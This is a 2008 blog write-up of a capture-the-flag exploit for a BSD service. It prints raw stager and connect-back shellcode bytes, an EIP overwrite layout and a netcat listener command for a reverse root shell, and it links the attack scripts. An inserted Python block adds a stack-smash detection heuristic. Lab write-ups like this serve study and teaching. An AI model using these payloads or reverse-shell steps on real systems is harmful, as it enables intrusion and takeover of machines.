Friday, June 6, 2008

Kenshoto CTF2008 pre-qual RealWorld200 Solution

Here was a problem that I had been working on with Evan (syn) at the CTF the other weekend, and I finally wrote up the solution into two scripts.

The first script uses the EAX value found by setting a breakpoint at 0x8048d2f. This value is "random", but it collides massively when sampled repeatedly, as Evan's solution write-up shows. So once you break here and check the value of EAX (and what it points to), you'll see your stack, and bingo: you can overwrite the EIP and get a shell.

After breaking here, I found EAX to be 0x08054600, so I could use that address for my injection into the buffer.

However, because we're restricted to 64 bytes of shellcode space, I opted to use the 43-byte Metasploit shellcode "bsd_ia32_reverse_stg", a stager that opens up a port and accepts a new shellcode of any size. With both of these things in mind, I also prefixed the buffer with a small NOP sled, just in case I was off by one or the return address landed somewhere inside the NOPs.

So now my connection string will look like <nop><shellcode><eip>, which looks like the following:

\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x6a\x61\x58\x99\x52\x68
\x10\x02\x02\x9a\x89\xe1\x52\x42\x52\x42\x52\x6a\x10\xcd\x80\x99
\x93\x51\x53\x52\x6a\x68\x58\xcd\x80\xb0\x6a\xcd\x80\x52\x53\xb6
\x10\x52\xb0\x1e\xcd\x80\x51\x50\x51\x97\x6a\x03\x58\xcd\x80\xc3
\x00\x46\x05\x08

Notice that the EIP at the end is reversed (little-endian): the bytes are read from the lowest address to the highest when you overwrite the EIP, so \x00\x46\x05\x08 = 0x08054600. This is very important.
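The <nop><shellcode><eip> layout above, decoded and checked the way a defender watching this service would, as an added example that is not part of the original write-up or its scripts. The 0x08048000-0x08100000 address range is an assumption for a 32-bit non-PIE binary, and the sample inputs are constructed.

```python
import struct

# Assumed: the target is a 32-bit non-PIE ELF, so code/data addresses sit in
# roughly 0x08048000-0x08100000 (the write-up's 0x8048d2f and 0x08054600 fit).
LOW_ADDR, HIGH_ADDR = 0x08048000, 0x08100000
BUFFER_SIZE = 64          # the 64 bytes of buffer space the write-up describes
NOP = 0x90                # x86 single-byte NOP used for the sled


def decode_payload(payload: bytes):
    """Split a <nop sled><shellcode><eip> blob into its three parts.

    The last four bytes are read little-endian, which is why the address
    0x08054600 appears on the wire as \\x00\\x46\\x05\\x08.
    """
    if len(payload) < 4:
        raise ValueError("payload shorter than a return address")
    sled_len = 0
    while sled_len < len(payload) - 4 and payload[sled_len] == NOP:
        sled_len += 1
    ret_addr = struct.unpack("<I", payload[-4:])[0]
    return sled_len, payload[sled_len:-4], ret_addr


def looks_like_stack_smash(data: bytes, min_sled: int = 4) -> bool:
    """Heuristic a sensor could apply to input for this service: overlong
    input whose trailing dword decodes to an address inside the binary's
    mapping, preceded by a NOP sled, is a strong sign of an EIP overwrite."""
    if len(data) <= BUFFER_SIZE:
        return False
    sled_len, _, ret_addr = decode_payload(data)
    return sled_len >= min_sled and LOW_ADDR <= ret_addr < HIGH_ADDR


# Constructed samples (not real captures): a benign request, and an overflow
# with the write-up's layout but the shellcode replaced by filler bytes.
BENIGN = b"GET KEY\n"
SMASH = b"\x90" * 10 + b"A" * 54 + struct.pack("<I", 0x08054600)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("smash", SMASH)):
        print(name, len(sample), looks_like_stack_smash(sample))
```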

Now run this a few times with a Python script, and you should have port 666 open and waiting for a new shellcode.

Injecting the new shellcode is easy. I opted for a reverse (connect-back) shell that would give me /bin/sh, mostly because I didn't want to leave a port open on the box for other people to connect to.

Using Metasploit's opcode generator, I created the following shellcode:

\x2b\xc9\x83\xe9\xef\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x25
\x7a\x72\xb3\x83\xeb\xfc\xe2\xf4\x4f\x1b\x2a\x2a\x77\x38\x20\xf1
\x77\x12\xde\xa3\x2d\x7b\xbf\x33\x4d\x6a\x70\xaa\xaa\xf3\x93\xd9
\x35\x2b\x22\xe2\xb2\x10\x10\xeb\xe8\xfa\x18\xb1\x7c\xca\x28\xe2
\x72\x2b\xbf\x33\x6c\x03\x84\xe3\x4d\x55\x5d\xc0\x4d\x12\x5d\xd1
\x4c\x14\xfb\x50\x75\x2e\x21\xe0\x95\x41\xbf\x33

This code will connect back to my IP (local NAT via VMware for now) on port 667 and give me a full-access /bin/sh!

So from a shell on my local machine, I set up netcat to listen with nc -vvnlp 667, sent my new shellcode off to port 666, and with any luck received a connection on the netcat listener, which means I have now owned this box with full root privileges and am ready to grab the key for the challenge!

Here are some useful links if you want to try it out for yourself (you'll need to modify the shell-script for your desired ports/IPs):
http://www.nopsr.us/ctf2008qual/ - questions
http://www.metasploit.com/shellcode/bsd/ - nice shellcode generators for BSD
http://cthulhu32.kraln.com/ctf2k8/200rwstage1.py - my first script; I run it 300 times to make sure port 666 gets opened
http://cthulhu32.kraln.com/ctf2k8/200rwstage2.py - my second script; connects back to 172.16.8.1 on port 667.
http://syndrowm.com/ctf2008qual/rw200-writeup.txt - Evan's write-up of the problem (he doesn't disclose the EAX location, and my scripts are entirely based on his little connector script.)

The binaries should be posted on Nopsr.us soon; if they don't get them up in the next few days I'll post Real-World 200 myself.
